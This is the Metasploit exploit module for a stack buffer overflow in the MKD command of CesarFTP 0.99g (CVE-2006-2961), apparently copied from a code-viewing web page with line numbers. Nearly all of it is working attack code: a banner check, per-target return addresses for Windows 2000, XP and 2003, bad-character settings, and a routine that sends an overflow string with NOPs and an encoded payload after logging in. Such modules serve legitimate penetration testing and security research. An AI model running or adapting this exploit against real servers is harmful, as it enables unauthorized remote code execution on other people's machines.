Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Ftp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Cesar FTP 0.99g MKD Command Buffer Overflow',
14
      'Description'    => %q{
15
        This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.
16

17
        You must have valid credentials to trigger this vulnerability. Also, you
18
        only get one chance, so choose your target carefully.
19
      },
20
      'Author'         => 'MC',
21
      'License'        => MSF_LICENSE,
22
      'References'     =>
23
        [
24
          [ 'CVE', '2006-2961'],
25
          [ 'OSVDB', '26364'],
26
          [ 'BID', '18586'],
27
          [ 'URL', 'http://web.archive.org/web/20060619195555/http://secunia.com:80/advisories/20574/' ],
28
        ],
29
      'Privileged'     => true,
30
      'DefaultOptions' =>
31
        {
32
          'EXITFUNC' => 'process',
33
        },
34
      'Payload'        =>
35
        {
36
          'Space'    => 250,
37
          'BadChars' => "\x00\x20\x0a\x0d",
38
          'StackAdjustment' => -3500,
39
          'Compat'        =>
40
            {
41
              'SymbolLookup' => 'ws2ord',
42
            }
43
        },
44
      'Platform'       => 'win',
45
      'Targets'        =>
46
        [
47
          [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],
48
          [ 'Windows 2000 Pro SP4 French',  { 'Ret' => 0x775F29D0 } ],
49
          [ 'Windows XP SP2/SP3 English',       { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll
50
          #[ 'Windows XP SP2 English',       { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll
51
          #[ 'Windows XP SP3 English',       { 'Ret' => 0x76b43adc } ], # jmp esp, winmm.dll
52
          [ 'Windows 2003 SP1 English',     { 'Ret' => 0x76AA679b } ],
53
        ],
54
      'DisclosureDate' => '2006-06-12',
55
      'DefaultTarget'  => 0))
56
  end
57

58
  def check
59
    connect
60
    disconnect
61

62
    if (banner =~ /CesarFTP 0\.99g/)
63
      return Exploit::CheckCode::Appears
64
    end
65
      return Exploit::CheckCode::Safe
66
  end
67

68
  def exploit
69
    c = connect_login
70
    return if not c
71

72
    sploit =  "\n" * 671 + rand_text_english(3, payload_badchars)
73
    sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded
74

75
    print_status("Trying target #{target.name}...")
76

77
    send_cmd( ['MKD', sploit] , false)
78

79
    handler
80
    disconnect
81
  end
82
end
83

84